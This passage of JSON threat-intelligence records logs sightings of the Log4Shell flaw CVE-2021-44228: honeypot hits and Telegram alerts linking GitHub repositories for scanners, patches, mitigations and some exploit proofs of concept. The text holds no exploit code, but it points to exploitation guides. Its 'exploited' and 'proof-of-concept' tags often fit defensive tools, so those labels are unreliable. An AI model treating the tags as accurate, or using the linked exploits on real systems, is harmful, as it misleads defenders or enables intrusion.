"The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "a4894abb-ffb7-45e8-88a4-28bbc1e99ff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-04)", "content": "", "creation_timestamp": "2026-04-04T00:00:00.000000Z"}, {"uuid": "68cdfb3c-571f-456c-b3ed-c0b47badd25a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "daafda56-2aa1-48d3-9d27-35b74386800f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-04)", "content": "", "creation_timestamp": "2026-04-04T00:00:00.000000Z"}, {"uuid": "79c12f28-adaa-4ccc-8652-b0088d522678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-05)", "content": "", "creation_timestamp": "2026-04-05T00:00:00.000000Z"}, {"uuid": "da9af1d7-598a-4729-bd5c-6a4b9d0b5cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "a9f14f41-6559-4183-80b6-b8e0df0ad909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/947", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple demo of CVE-2021-44228\nURL\uff1ahttps://github.com/datadavev/test-44228", "creation_timestamp": "2021-12-11T15:44:12.000000Z"}, {"uuid": "dfbd2480-e3f6-4d01-85d7-ea51533a616f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/MXX7s40szsHIOahCmZYUo1oPbzx8GV2ib_l3MQ9GkEPvzG8", "content": "", "creation_timestamp": "2025-12-15T03:00:07.000000Z"}, {"uuid": "1064f522-8896-4657-ae0f-4518886ddba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/QXEVm7CRuLVb1xNoxUOSwrTnJ_CRu9kpmOAYRx2XayAcy58", "content": "", "creation_timestamp": "2025-12-05T21:00:04.000000Z"}, {"uuid": "afd07a3b-1ed9-4f31-854e-7e27cfab9843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-06)", "content": "", "creation_timestamp": "2026-04-06T00:00:00.000000Z"}, {"uuid": "8fd76ca6-b4e4-4d70-933c-7a035b64d4c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/946", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple Python 3 script to detect the Java library \\\"Log4j\\\" vulnerability (CVE-2021-44228) for a list of URLs\nURL\uff1ahttps://github.com/takito1812/log4j-detect", "creation_timestamp": "2021-12-11T15:40:01.000000Z"}, {"uuid": "16bcf9fe-bd14-441e-b9e4-1c24eb319a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/944", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aContent to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228\nURL\uff1ahttps://github.com/cado-security/log4shell", "creation_timestamp": "2021-12-11T14:54:06.000000Z"}, {"uuid": "826588dc-dfa0-468e-928f-523e84b122ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/928", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFixes CVE-2021-44228 in log4j by patching JndiLookup class\nURL\uff1ahttps://github.com/jacobtread/L4J-Vuln-Patch", "creation_timestamp": "2021-12-11T07:20:09.000000Z"}, {"uuid": "25e5c3b2-e247-4d66-80cb-fb72466dfedb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/937", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aVulnerability scanner for Log4j2 CVE-2021-44228\nURL\uff1ahttps://github.com/logpresso/CVE-2021-44228-Scanner", "creation_timestamp": "2021-12-11T11:33:25.000000Z"}, {"uuid": "e18a2f66-b4d5-4948-9397-e8423f7d6a8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1024", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFile transfers using the log4shell vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/Chelsea486MHz/ftp_over_log4j", "creation_timestamp": "2021-12-13T17:29:55.000000Z"}, {"uuid": "4e47f4ed-5f26-47d1-b1d6-c3a57b899708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1115", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-scanner", "creation_timestamp": "2021-12-16T14:31:58.000000Z"}, {"uuid": "656aa4aa-011a-4a99-84f8-5d4d78b17647", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1037", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228\nURL\uff1ahttps://github.com/alexbakker/log4shell-tools", "creation_timestamp": "2021-12-13T22:19:28.000000Z"}, {"uuid": "83e68adb-841b-43eb-b632-00ccc429cda7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1075", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanners for Jar files that may be vulnerable to CVE-2021-44228\nURL\uff1ahttps://github.com/CERTCC/CVE-2021-44228_scanner", "creation_timestamp": "2021-12-14T23:36:21.000000Z"}, {"uuid": "27aa8357-fc8a-4fff-ae90-284692216e2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1074", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aUsing code search to help fix/mitigate log4j CVE-2021-44228\nURL\uff1ahttps://github.com/sourcegraph/log4j-cve-code-search-resources", "creation_timestamp": "2021-12-14T23:27:58.000000Z"}, {"uuid": "9e55610d-d54a-463b-a81c-66199b5e2774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1084", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aVulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228\nURL\uff1ahttps://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner", "creation_timestamp": "2021-12-15T11:17:55.000000Z"}, {"uuid": "346177e6-b5c4-4f55-9af7-8f8435dc1f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1083", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIdentifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228\nURL\uff1ahttps://github.com/KeysAU/Get-log4j-Windows.ps1", "creation_timestamp": "2021-12-15T11:00:44.000000Z"}, {"uuid": "5c3f53e4-428d-4118-a5cc-af95f34faa39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1082", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations\nURL\uff1ahttps://github.com/rgl/log4j-log4shell-playground", "creation_timestamp": "2021-12-15T07:55:39.000000Z"}, {"uuid": "774c758b-8dcd-4b13-a73a-37e2f6c26261", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1087", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTest case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions\nURL\uff1ahttps://github.com/mss/log4shell-hotfix-side-effect", "creation_timestamp": "2021-12-15T13:18:29.000000Z"}, {"uuid": "cd7b89c2-efe1-4a48-b97c-6dee6650694e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1112", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)\nURL\uff1ahttps://github.com/MeterianHQ/log4j-vuln-coverage-check", "creation_timestamp": "2021-12-16T14:01:27.000000Z"}, {"uuid": "981e0428-ffd7-43db-b25e-2f076f221ebe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1111", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/Gyrfalc0n/scanlist-log4j", "creation_timestamp": "2021-12-16T13:26:47.000000Z"}, {"uuid": "4cd1d406-6a84-49cb-a516-fe416fb0a6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1143", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis project will help to test the Log4j CVE-2021-44228 vulnerability.\nURL\uff1ahttps://github.com/immunityinc/Log4j-JNDIServer", "creation_timestamp": "2021-12-17T20:08:43.000000Z"}, {"uuid": "f468eb31-f573-4196-a5aa-26a43ee28d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1224", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks\nURL\uff1ahttps://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp", "creation_timestamp": "2021-12-24T07:27:41.000000Z"}, {"uuid": "e1443e70-7852-44b0-926e-34bc43719068", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1223", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 \u68c0\u67e5\u5de5\u5177\nURL\uff1ahttps://github.com/ainrm/log4j-scan", "creation_timestamp": "2021-12-24T02:46:27.000000Z"}, {"uuid": "84b1cd33-ace3-4945-a0c6-707eefbda999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1231", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple exploitation guide for CVE-2021-44228.\nURL\uff1ahttps://github.com/CrashOverflow/Log4J-POC", "creation_timestamp": "2021-12-24T19:28:04.000000Z"}, {"uuid": "fe6a0f48-4f23-42ce-9fb1-00279c621e2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1230", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat\nURL\uff1ahttps://github.com/many-fac3d-g0d/apache-tomcat-log4j", "creation_timestamp": "2021-12-24T18:58:40.000000Z"}, {"uuid": "9ac414d1-8387-44bd-83f7-f3bebd212ded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1229", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aa project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD\nURL\uff1ahttps://github.com/ArkAngeL43/f-for-java", "creation_timestamp": "2021-12-24T18:08:13.000000Z"}, {"uuid": "3bd38c8c-b026-499d-a1e5-8a9b92296cc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1227", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSmall example repo for looking into log4j CVE-2021-44228\nURL\uff1ahttps://github.com/LiveOverflow/log4shell", "creation_timestamp": "2021-12-24T15:50:29.000000Z"}, {"uuid": "bd72b4ca-6282-4313-818e-7e738ebab934", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1114", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBasic Vulnerable Spring Boot Application to Test CVE-2021-44228\nURL\uff1ahttps://github.com/recanavar/vuln_spring_log4j2", "creation_timestamp": "2021-12-16T14:27:33.000000Z"}, {"uuid": "86d9e26e-b8d3-449d-95f0-11b21bd47b13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8427", "content": "Trend Micro's Web Based scanner for CVE-2021-44228 aka Log4Shell.\n\nlog4j-tester.trendmicro.com", "creation_timestamp": "2021-12-16T07:34:06.000000Z"}, {"uuid": "8ef55c83-d9c4-4cbf-b81c-1cc114974314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-07)", "content": "", "creation_timestamp": "2026-04-07T00:00:00.000000Z"}, {"uuid": "da467906-9e01-49cb-b7ce-d0105cba5689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/930", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScans files for .jars potentially vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the .jar.\nURL\uff1ahttps://github.com/1lann/log4shelldetect", "creation_timestamp": "2021-12-11T07:45:13.000000Z"}, {"uuid": "4d627ff0-3527-4c39-8f46-aa5382d9e07a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/929", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFixes CVE-2021-44228 in log4j by patching JndiLookup class\nURL\uff1ahttps://github.com/saharNooby/log4j-vulnerability-patcher-agent", "creation_timestamp": "2021-12-11T07:36:41.000000Z"}, {"uuid": "ce5da86d-1223-4e88-a244-a45524a17c62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1003", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 log4j mitigation using aws wafv2 with ansible\nURL\uff1ahttps://github.com/markuman/aws-log4j-mitigations", "creation_timestamp": "2021-12-13T08:04:28.000000Z"}, {"uuid": "bf1a1e65-84b8-48b1-84ba-277cbdd4f3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1002", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation for different environments \nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228", "creation_timestamp": "2021-12-13T07:34:31.000000Z"}, {"uuid": "21b384ea-0ef9-4bfe-9a0e-15b466533306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1001", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner for Log4j RCE CVE-2021-44228\nURL\uff1ahttps://github.com/thecyberneh/Log4j-RCE-Exploiter", "creation_timestamp": "2021-12-13T06:56:29.000000Z"}, {"uuid": "329e5ee2-6892-4331-8529-956eb0fd5f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/999", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aJava agent that disables Apache Log4J's JNDI Lookup. Fixes CVE-2021-44228, aka \\\"Log4Shell.\\\"\nURL\uff1ahttps://github.com/alerithe/log4noshell", "creation_timestamp": "2021-12-13T05:35:24.000000Z"}, {"uuid": "be524f5d-8bbf-4bd0-aa4a-54e93a62dffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/997", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aa fast check, if your server could be vulnerable to CVE-2021-44228\nURL\uff1ahttps://github.com/rubo77/log4j_checker_beta", "creation_timestamp": "2021-12-13T04:18:53.000000Z"}, {"uuid": "413c8120-c131-45a0-90e8-bef14017f15b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/996", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIngest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes\nURL\uff1ahttps://github.com/0xRyan/log4j-nullroute", "creation_timestamp": "2021-12-13T03:19:35.000000Z"}, {"uuid": "053e0aa6-81c3-4474-baa8-bed6bbe48d4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/926", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.\nURL\uff1ahttps://github.com/rakutentech/jndi-ldap-test-server", "creation_timestamp": "2021-12-11T04:05:03.000000Z"}, {"uuid": "08123739-d0f5-4ac6-bb56-eaad60a82774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/939", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScan your logs for CVE-2021-44228 related activity and report the attackers\nURL\uff1ahttps://github.com/js-on/jndiRep", "creation_timestamp": "2021-12-11T12:27:45.000000Z"}, {"uuid": "2beeee7d-5bc1-4aaa-bf9a-f3be1a88489a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/938", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTest the CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\nURL\uff1ahttps://github.com/gauthamg/log4j2021_vul_test", "creation_timestamp": "2021-12-11T11:46:10.000000Z"}, {"uuid": "4efb6466-b24c-4fe7-a140-423bd2eac999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/920", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aJava Agent that disables Apache Log4J's JNDI Lookup. Quick-fix for CVE-2021-44228\nURL\uff1ahttps://github.com/alerithe/log4j-patcher", "creation_timestamp": "2021-12-11T02:29:14.000000Z"}, {"uuid": "d9300331-929a-4930-a1d9-b56f6f697555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/927", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\uff0clog4j2 burp\u63d2\u4ef6 